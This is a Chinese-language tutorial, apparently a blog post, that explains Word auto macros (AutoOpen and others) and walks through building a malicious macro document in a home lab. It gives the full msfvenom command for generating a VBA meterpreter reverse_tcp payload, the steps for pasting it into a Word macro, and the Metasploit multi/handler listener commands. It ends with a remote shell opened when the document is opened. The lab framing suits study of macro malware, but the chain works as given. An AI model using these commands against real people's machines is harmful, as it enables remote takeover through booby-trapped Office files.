0x00 什么是宏病毒
宏病毒就是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当打开带有宏病毒的word文档时,嵌入其中的宏代码会自动运行
Word 将下列名称识别为自动宏,或称“auto”宏,当相应动作被执行,会自动调用满足条件的VBA代码。
AutoExec:启动 Word 或加载全局模板时
AutoNew:每次新建文档时
AutoOpen:每次打开已有文档时
AutoClose:每次关闭文档时
0x01 简单实验环境搭建
本次实验的环境为:
win_10
word_2013
VM_kali_linux_2018(桥接模式)
首先在电脑中word信任中心设置中,打开启动所有宏选项,并信任对VBA工程对象模型的访问,以便更好的查看实验效果。
宏设置
在开发者工具中选中宏,编辑宏名称和宏位置后点击创建,进入VBA代码编辑界面。
宏创建
代码编辑界面
0x02实验开始
准备工作完成后,在kali中使用msfvenom生成一个vba类型的后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=6666 -f vba -o test.vba
生成后门文件
将vba文件中的代码复制入刚刚的代码编辑界面,并保存。
查看windows主机的ip地址
ipconfig
在msf中设置本机监听:
use exploit/multi/handler #选泽监听模块
set payload windows/meterpreter/reverse_tcp #选择生成木马相同的类型
set LHOST 192.168.1.169 #设置本机ip监听
set LPORT 6666 # 设置本机监听端口
exploit #执行监听
当windows中打开我们生成的test.docx时,msf中接收到了来自192.168.1.249的连接。
获取shell
在windows中查看相应连接建立情况,并搜索进程,建立连接的正是winword应用程序。
netstat -ano | grep "6666"
tasklist | grep "11400"
image.png
网友评论